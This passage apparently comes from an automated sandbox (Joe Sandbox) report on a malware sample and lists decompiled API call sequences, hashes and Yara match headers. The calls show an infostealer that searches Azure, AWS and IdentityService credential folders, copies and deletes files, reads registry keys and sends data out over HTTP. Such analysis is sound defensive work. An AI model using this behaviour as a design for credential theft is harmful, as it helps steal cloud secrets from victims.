                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                                        • StrCmpCA.SHLWAPI(?,0082B8A0), ref: 00405A13
                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0082B840,00000000,?,007F2AC8,00000000,?,00421A1C), ref: 00405E71
                                                        • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                                        • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                                        • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                                        • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                                        • memcpy.MSVCRT(?), ref: 00405EFE
                                                        • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                                        • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                                        • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                                        • HttpOpenRequestA.WININET(00000000,0082B8B0,?,0082B1A0,00000000,00000000,00400100,00000000), ref: 00405BF8
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                        • String ID: "$"$------$------$------
                                                        • API String ID: 1406981993-2180234286
                                                        • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                        • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                                        • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                        • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                                        APIs
                                                        • memset.MSVCRT ref: 00414D87
                                                          • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                                        • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                          • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                        • memset.MSVCRT ref: 00414E13
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                                        • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                          • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                          • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                        • memset.MSVCRT ref: 00414E9F
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                                        • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                          • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                          • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                          • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,0082B7A0,?,000003E8), ref: 00414A4A
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                          • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                          • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                          • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                        • memset.MSVCRT ref: 00414F2B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                                        • API String ID: 4017274736-156832076
                                                        • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                        • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                                        • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                        • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,007F2948,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                                        • lstrcatA.KERNEL32(?,00000000,00826768,00421474,00826768,00421470,00000000), ref: 0040D208
                                                        • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                                        • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                                        • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                                        • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                                        • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                                        • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                                        • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008267A8,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                        • lstrlenA.KERNEL32(?), ref: 0040D32A
                                                        • lstrlenA.KERNEL32(?), ref: 0040D339
                                                        • memset.MSVCRT ref: 0040D388
                                                          • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                        • String ID:
                                                        • API String ID: 2775534915-0
                                                        • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                        • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                                        • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                        • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B2D1EA
                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B2D32E
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B2D335
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B2D46F
                                                        • lstrcat.KERNEL32(?,00421478), ref: 00B2D47E
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B2D491
                                                        • lstrcat.KERNEL32(?,0042147C), ref: 00B2D4A0
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B2D4B3
                                                        • lstrcat.KERNEL32(?,00421480), ref: 00B2D4C2
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B2D4D5
                                                        • lstrcat.KERNEL32(?,00421484), ref: 00B2D4E4
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B2D4F7
                                                        • lstrcat.KERNEL32(?,00421488), ref: 00B2D506
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B2D519
                                                        • lstrcat.KERNEL32(?,0042148C), ref: 00B2D528
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B2D53B
                                                        • lstrcat.KERNEL32(?,00421490), ref: 00B2D54A
                                                          • Part of subcall function 00B3AA87: lstrlen.KERNEL32(00B2516C,?,?,00B2516C,00420DDE), ref: 00B3AA92
                                                          • Part of subcall function 00B3AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B3AAEC
                                                        • lstrlen.KERNEL32(?), ref: 00B2D591
                                                        • lstrlen.KERNEL32(?), ref: 00B2D5A0
                                                        • memset.MSVCRT ref: 00B2D5EF
                                                          • Part of subcall function 00B3ACD7: StrCmpCA.SHLWAPI(0064A350,00B2AA0E,?,00B2AA0E,0064A350), ref: 00B3ACF6
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00B2D61B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                        • String ID:
                                                        • API String ID: 1973479514-0
                                                        • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                        • Instruction ID: a29cf17a3239687ad1fa019d40a013c96fcd566c7d404b2c53821cf466ef105b
                                                        • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                                        • Instruction Fuzzy Hash: 9AE15D76950118ABCB04FBE0DD96EEE73B9AF15701F704199F146B20A1DE34AA08CF62
                                                        APIs
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A51
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A68
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A7F
                                                          • Part of subcall function 00B24A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B24AA0
                                                          • Part of subcall function 00B24A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B24AB0
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B25C5F
                                                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B25C7A
                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B25DFA
                                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 00B260D8
                                                        • lstrlen.KERNEL32(00000000), ref: 00B260E9
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00B260FA
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B26101
                                                        • lstrlen.KERNEL32(00000000), ref: 00B26116
                                                        • memcpy.MSVCRT(?,00000000,00000000), ref: 00B2612D
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2613F
                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B26158
                                                        • memcpy.MSVCRT(?), ref: 00B26165
                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00B26182
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B26196
                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00B261B3
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B26217
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B26224
                                                        • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B25E5F
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B2622E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                        • String ID:
                                                        • API String ID: 1703137719-0
                                                        • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                        • Instruction ID: b35fe3c464a53555783ee1ac5c60cd24fcd8bf8935b04e2ed4b86f30a75221fc
                                                        • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                        • Instruction Fuzzy Hash: F912DE72950228ABCB15EBA0DD95FEEB3B9BF15701F6041D9B146720A1EF702B88CF51
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00829930,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                                        • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                                        • StrStrA.SHLWAPI(?,00829990,00420B52), ref: 0040CAF7
                                                        • StrStrA.SHLWAPI(00000000,008299C0), ref: 0040CB1E
                                                        • StrStrA.SHLWAPI(?,0082A890,00000000,?,00421458,00000000,?,00000000,00000000,?,00826748,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                                        • StrStrA.SHLWAPI(00000000,0082AAF0), ref: 0040CCB9
                                                          • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                                          • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,008267F8), ref: 0040C871
                                                          • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                          • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                        • StrStrA.SHLWAPI(?,0082AAF0,00000000,?,0042145C,00000000,?,00000000,008267F8), ref: 0040CD5A
                                                        • StrStrA.SHLWAPI(00000000,00826938), ref: 0040CD71
                                                          • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                          • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                          • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                        • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                        • String ID:
                                                        • API String ID: 3555725114-3916222277
                                                        • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                        • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                                        • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                        • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 00B2CCD3
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00B2CCF0
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00B2CCFC
                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B2CD0F
                                                        • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 00B2CD1C
                                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00B2CD40
                                                        • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 00B2CD5E
                                                        • StrStrA.SHLWAPI(00000000,0064A364), ref: 00B2CD85
                                                        • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 00B2CF09
                                                        • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 00B2CF20
                                                          • Part of subcall function 00B2CA87: memset.MSVCRT ref: 00B2CABA
                                                          • Part of subcall function 00B2CA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B2CAD8
                                                          • Part of subcall function 00B2CA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B2CAE3
                                                          • Part of subcall function 00B2CA87: memcpy.MSVCRT(?,?,?), ref: 00B2CB79
                                                        • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 00B2CFC1
                                                        • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 00B2CFD8
                                                          • Part of subcall function 00B2CA87: lstrcat.KERNEL32(?,00420B46), ref: 00B2CBAA
                                                          • Part of subcall function 00B2CA87: lstrcat.KERNEL32(?,00420B47), ref: 00B2CBBE
                                                          • Part of subcall function 00B2CA87: lstrcat.KERNEL32(?,00420B4E), ref: 00B2CBDF
                                                        • lstrlen.KERNEL32(00000000), ref: 00B2D0AB
                                                        • CloseHandle.KERNEL32(00000000), ref: 00B2D103
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                        • String ID:
                                                        • API String ID: 3555725114-3916222277
                                                        • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                        • Instruction ID: b77cf0ff4db214c715f219ee84ed5512e342b1029bc0843abd2cbf0f4a625d63
                                                        • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                        • Instruction Fuzzy Hash: 83E12272900208AFCB14EBA4DD91FEEB7B9AF15700F605199F146B31A1EF346A89CF51
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • RegOpenKeyExA.ADVAPI32(00000000,007F6688,00000000,00020019,00000000,004205B6), ref: 004183A4
                                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                        • wsprintfA.USER32 ref: 00418459
                                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
